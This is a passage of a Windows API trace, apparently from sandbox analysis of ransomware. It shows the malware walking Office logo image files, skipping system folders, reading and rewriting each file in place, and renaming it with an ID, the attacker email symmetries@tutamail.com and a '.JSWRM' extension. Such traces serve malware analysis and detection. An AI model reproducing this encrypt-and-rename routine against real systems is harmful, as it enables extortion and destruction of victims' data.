[0132.342] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-100.png", lpString2="windows") returned -1 [0132.342] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-100.png", lpString2="recovery") returned -1 [0132.342] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-100.png", lpString2="perflogs") returned -1 [0132.342] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-100.png", lpString2="documents and settings") returned 1 [0132.342] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0132.342] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-100.png", lpString2="system volume information") returned -1 [0132.342] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-100.png", lpString2="msocache") returned -1 [0132.342] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.contrast-black_scale-100.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0132.342] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.contrast-black_scale-100.png", cchWideChar=38, lpMultiByteStr=0x22d0d8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogo.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 38 [0132.342] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.contrast-black_scale-100.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0132.342] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.contrast-black_scale-100.png", cchWideChar=38, lpMultiByteStr=0x22ce70, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogo.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 38 [0132.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.343] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogo.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogo.contrast-black_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.343] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2255) returned 1 [0132.343] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.343] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x8c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x8c0, lpOverlapped=0x0) returned 1 [0132.345] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.345] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x8c0, lpOverlapped=0x0) returned 1 [0132.345] CloseHandle (hObject=0x238) returned 1 [0132.346] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogo.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogo.contrast-black_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogo.contrast-black_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogo.contrast-black_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.347] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x198afa29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198afa29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198afa29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbe5, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="ExcelLogo.contrast-black_scale-140.png", cAlternateFileName="EX9DAA~1.PNG")) returned 1 [0132.347] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-140.png", lpString2=".") returned 1 [0132.347] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-140.png", lpString2="..") returned 1 [0132.347] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-140.png", lpString2="...") returned 1 [0132.347] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-140.png", lpString2="windows") returned -1 [0132.347] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-140.png", lpString2="recovery") returned -1 [0132.347] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-140.png", lpString2="perflogs") returned -1 [0132.347] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-140.png", lpString2="documents and settings") returned 1 [0132.347] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0132.347] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-140.png", lpString2="system volume information") returned -1 [0132.347] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-140.png", lpString2="msocache") returned -1 [0132.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.contrast-black_scale-140.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0132.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.contrast-black_scale-140.png", cchWideChar=38, lpMultiByteStr=0x22d0d8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogo.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 38 [0132.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.contrast-black_scale-140.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0132.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.contrast-black_scale-140.png", cchWideChar=38, lpMultiByteStr=0x22d260, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogo.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 38 [0132.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.347] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogo.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogo.contrast-black_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.348] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3045) returned 1 [0132.348] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.348] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xbe0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xbe0, lpOverlapped=0x0) returned 1 [0132.350] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.350] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xbe0, lpOverlapped=0x0) returned 1 [0132.350] CloseHandle (hObject=0x238) returned 1 [0132.350] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogo.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogo.contrast-black_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogo.contrast-black_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogo.contrast-black_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.351] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x198d5bc7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198d5bc7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198d5bc7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe13, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="ExcelLogo.contrast-black_scale-180.png", cAlternateFileName="EXD3EA~1.PNG")) returned 1 [0132.351] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-180.png", lpString2=".") returned 1 [0132.351] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-180.png", lpString2="..") returned 1 [0132.351] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-180.png", lpString2="...") returned 1 [0132.351] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-180.png", lpString2="windows") returned -1 [0132.351] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-180.png", lpString2="recovery") returned -1 [0132.351] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-180.png", lpString2="perflogs") returned -1 [0132.351] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-180.png", lpString2="documents and settings") returned 1 [0132.351] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0132.351] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-180.png", lpString2="system volume information") returned -1 [0132.351] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-180.png", lpString2="msocache") returned -1 [0132.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.contrast-black_scale-180.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0132.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.contrast-black_scale-180.png", cchWideChar=38, lpMultiByteStr=0x22d260, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogo.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 38 [0132.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.contrast-black_scale-180.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0132.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.contrast-black_scale-180.png", cchWideChar=38, lpMultiByteStr=0x22cdc8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogo.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 38 [0132.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.352] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogo.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogo.contrast-black_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.352] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3603) returned 1 [0132.352] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.352] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xe10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xe10, lpOverlapped=0x0) returned 1 [0132.356] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.356] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xe10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xe10, lpOverlapped=0x0) returned 1 [0132.356] CloseHandle (hObject=0x238) returned 1 [0132.356] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogo.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogo.contrast-black_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogo.contrast-black_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogo.contrast-black_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.357] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x198d5bc7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198d5bc7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198d5bc7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7b3, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="ExcelLogo.contrast-black_scale-80.png", cAlternateFileName="EX9BE5~1.PNG")) returned 1 [0132.357] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-80.png", lpString2=".") returned 1 [0132.357] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-80.png", lpString2="..") returned 1 [0132.357] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-80.png", lpString2="...") returned 1 [0132.357] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-80.png", lpString2="windows") returned -1 [0132.357] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-80.png", lpString2="recovery") returned -1 [0132.357] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-80.png", lpString2="perflogs") returned -1 [0132.358] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-80.png", lpString2="documents and settings") returned 1 [0132.358] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0132.358] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-80.png", lpString2="system volume information") returned -1 [0132.358] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-80.png", lpString2="msocache") returned -1 [0132.358] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.contrast-black_scale-80.png", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0132.358] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.contrast-black_scale-80.png", cchWideChar=37, lpMultiByteStr=0x22d0d8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogo.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 37 [0132.358] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.contrast-black_scale-80.png", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0132.358] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.contrast-black_scale-80.png", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogo.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 37 [0132.358] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.358] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.358] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogo.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogo.contrast-black_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.359] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1971) returned 1 [0132.359] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.359] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x7b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x7b0, lpOverlapped=0x0) returned 1 [0132.394] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.394] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x7b0, lpOverlapped=0x0) returned 1 [0132.394] CloseHandle (hObject=0x238) returned 1 [0132.394] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogo.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogo.contrast-black_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogo.contrast-black_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogo.contrast-black_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.395] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x198afa29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198afa29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198afa29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8d9, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="ExcelLogo.contrast-white_scale-100.png", cAlternateFileName="EXC172~1.PNG")) returned 1 [0132.395] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-100.png", lpString2=".") returned 1 [0132.395] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-100.png", lpString2="..") returned 1 [0132.395] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-100.png", lpString2="...") returned 1 [0132.395] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-100.png", lpString2="windows") returned -1 [0132.395] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-100.png", lpString2="recovery") returned -1 [0132.395] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-100.png", lpString2="perflogs") returned -1 [0132.395] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-100.png", lpString2="documents and settings") returned 1 [0132.395] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0132.395] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-100.png", lpString2="system volume information") returned -1 [0132.395] lstrcmpiW (lpString1="ExcelLogo.contrast-white_scale-100.png", lpString2="msocache") returned -1 [0132.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.contrast-white_scale-100.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0132.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.contrast-white_scale-100.png", cchWideChar=38, lpMultiByteStr=0x22cdc8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogo.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 38 [0132.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.contrast-white_scale-100.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0132.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.contrast-white_scale-100.png", cchWideChar=38, lpMultiByteStr=0x22d260, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogo.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 38 [0132.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.396] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogo.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogo.contrast-white_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.396] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2265) returned 1 [0132.396] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.396] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x8d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x8d0, lpOverlapped=0x0) returned 1 [0132.399] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.399] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x8d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x8d0, lpOverlapped=0x0) returned 1 [0132.399] CloseHandle (hObject=0x238) returned 1 [0132.399] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogo.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogo.contrast-white_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogo.contrast-white_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogo.contrast-white_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.400] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19889710, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19889710, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198afa29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbd8, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="ExcelLogo.contrast-white_scale-140.png", 